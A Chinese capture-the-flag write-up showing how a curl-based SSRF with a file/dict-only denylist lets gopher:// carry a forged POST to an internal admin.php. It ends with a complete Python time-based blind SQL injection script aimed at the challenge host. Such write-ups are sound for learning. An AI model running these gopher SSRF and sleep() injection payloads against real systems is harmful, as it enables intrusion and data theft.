第一次遇到用 SSRF 打内网 SQL 注入的题目，记录一下。
index.php 的源码（题目通过 highlight_file 直接展示出来）：
<?php
// Challenge source: printed verbatim to every visitor, so the SSRF sink below is public.
highlight_file(__FILE__);
session_start();
// Attacker-controlled URL taken straight from the query string; false when absent.
$url = $_GET['url'] ?? false;
if($url)
{
// Denylist, not allowlist: only the substrings "file" and "dict" are rejected
// (case-insensitively), so file:// and dict:// are blocked while gopher://,
// http://, ftp:// and every other scheme curl supports still pass.  gopher://
// is what the write-up uses: curl writes the percent-decoded selector as raw
// bytes to 127.0.0.1:80, i.e. an arbitrary HTTP POST to the internal admin.php.
// NOTE(review): preg_match() returns false on a PCRE error; false == 1 is false,
// so an error in the filter also falls through to the curl call.
$a = preg_match("/file|dict/i", $url);
if ($a==1)
{
exit();
}
// No CURLOPT_PROTOCOLS / CURLOPT_REDIR_PROTOCOLS restriction and no timeout.
// The raw $_GET["url"] is re-read here instead of $url (same value in practice).
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_HEADER, 0);
// CURLOPT_RETURNTRANSFER is not set, so curl_exec() echoes the response body
// straight back to the client: this is a full-read SSRF, not a blind one.
curl_exec($ch);
curl_close($ch);
}
?>
其他师傅目录扫描扫出了 admin.php（我自己没扫出来）。
admin.php 提示传入 poc 参数，后面的 payload 就是通过 POST 的 poc 字段注入的。
index.php 是明显的 SSRF：黑名单只拦了 file 和 dict，gopher 没拦，可以用 gopher:// 向 127.0.0.1:80 发送任意 HTTP POST 报文，结合题目就能想到用 SSRF 打内网的 SQL 注入。
剩下的问题就是怎么构造 payload：gopher 请求要把完整的 HTTP 报文做两次 URL 编码（一次给 curl 的 gopher selector，一次给外层的 ?url= 参数），换行必须是 \r\n，头和 body 之间要有空行。
测试后发现注入点在括号里：用 `0)` 闭合括号，再用 `#` 注释掉后面的语句。
页面没有任何回显，所以只能用 sleep() 做时间盲注，按位二分提取 flag。
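import time
import urllib.error
import urllib.parse
import urllib.request

# Outer SSRF entry point (index.php) and the internal service reached through it.
TARGET = "http://121.36.147.29:20001/?url="
INTERNAL_GOPHER = "gopher://127.0.0.1:80/"

# Time-based blind injection parameters.  admin.php sleeps SLEEP_SECONDS when the
# guessed condition is true; any round trip longer than SLOW_THRESHOLD is read as
# "true".  The gap between the two is all that absorbs network jitter: on a slow
# or noisy link raise SLEEP_SECONDS (and SLOW_THRESHOLD with it), otherwise a
# merely slow response is misread as "true" and the recovered flag is garbage.
SLEEP_SECONDS = 0.5
SLOW_THRESHOLD = 0.4
REQUEST_TIMEOUT = 10.0    # seconds; a timed-out request counts as "slow"
MAX_FLAG_LENGTH = 99      # the original loop ran range(1, 100)
CHAR_LOW, CHAR_HIGH = 0, 128   # half-open ASCII search window [CHAR_LOW, CHAR_HIGH)


def build_http_request(body: str, path: str = "/admin.php", host: str = "127.0.0.1") -> str:
    """Return a raw HTTP/1.1 POST request (CRLF line endings) carrying *body*.

    curl writes this text verbatim to the internal port over gopher://, so it has
    to be a complete, well-formed request: CRLF line endings and the empty line
    that separates the headers from the body (without it the server reads the
    payload as a malformed header and never sees the POST parameter).

    Args:
        body: URL-encoded form body, e.g. ``poc=...``.
        path: request target on the internal host.
        host: value for the Host header.
    """
    lines = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode('utf-8'))}",
        "Connection: close",
        "",        # header/body separator
        body,
        "",        # trailing CRLF, as in the original write-up
    ]
    return "\r\n".join(lines)


def build_gopher_url(body: str, *, target: str = TARGET, internal: str = INTERNAL_GOPHER) -> str:
    """Return the full attack URL that makes index.php POST *body* to admin.php.

    The request is percent-encoded twice on purpose: the inner layer is the
    gopher selector, which curl percent-decodes before writing it to the socket;
    the outer layer is for the ``?url=`` query parameter, which PHP decodes when
    it fills ``$_GET``.  The ``_`` right after the ``/`` is the gopher item-type
    byte; curl strips it and sends everything that follows.

    Args:
        body: form body to deliver to the internal service.
        target: outer SSRF endpoint, up to and including ``?url=``.
        internal: ``gopher://host:port/`` prefix of the internal service.
    """
    selector = urllib.parse.quote(build_http_request(body))   # inner layer: \r\n -> %0D%0A, ' ' -> %20 ...
    return target + internal + "_" + urllib.parse.quote(selector)   # outer layer: '%' -> %25


def blind_payload(position: int, threshold: int) -> str:
    """Return the POST body that makes admin.php sleep iff ascii(flag[position]) > threshold.

    ``0)`` closes the parenthesised value the vulnerable query wraps around the
    ``poc`` parameter and ``#`` comments out the rest of the statement.
    *position* is 1-based, as MySQL's substr() expects.
    """
    return (
        "poc=0) or if((ascii(substr((select flag from flag),{},1)))>{},sleep({}),1) #"
        .format(position, threshold, SLEEP_SECONDS)
    )


def request_is_slow(url: str) -> bool:
    """Fetch *url* and report whether the round trip exceeded SLOW_THRESHOLD.

    Only the elapsed time carries information: the response body is discarded
    and transport/HTTP errors are swallowed, because an error response still
    took the measured time.  A request that hits REQUEST_TIMEOUT is "slow".
    """
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(url, timeout=REQUEST_TIMEOUT) as resp:
            resp.read()
    except OSError:
        # urllib.error.URLError, HTTPError and socket timeouts are all OSError.
        pass
    return time.perf_counter() - start > SLOW_THRESHOLD


def find_char(position: int) -> str:
    """Binary-search the ASCII value of flag[position] (1-based) via request timing.

    Each probe asks "is ascii(flag[position]) > mid?".  When the loop ends
    ``low`` is the smallest value for which that is false, i.e. the character.
    Past the end of the flag substr() yields '' and ascii('') is 0, so the
    search collapses to chr(0).
    """
    low, high = CHAR_LOW, CHAR_HIGH
    while low < high:
        mid = (low + high) // 2
        if request_is_slow(build_gopher_url(blind_payload(position, mid))):
            low = mid + 1      # condition true: value > mid
        else:
            high = mid         # condition false: value <= mid
    return chr(low)


def extract_flag(max_length: int = MAX_FLAG_LENGTH) -> str:
    """Recover the flag one character at a time, printing progress as it goes.

    Stops early at the first position that resolves to chr(0), which is what an
    empty substr() past the end of the flag produces (see find_char).
    """
    flag = ""
    for position in range(1, max_length + 1):
        ch = find_char(position)
        if ch == "\0":
            break
        flag += ch
        print(flag)
    return flag


def main() -> None:
    # First the one-shot PoC from the write-up (admin.php hangs ~3 s if the
    # injection works), then the per-character extraction.
    print(build_gopher_url("poc=0) or sleep(3) #"))
    print("flag:", extract_flag())


if __name__ == "__main__":
    main()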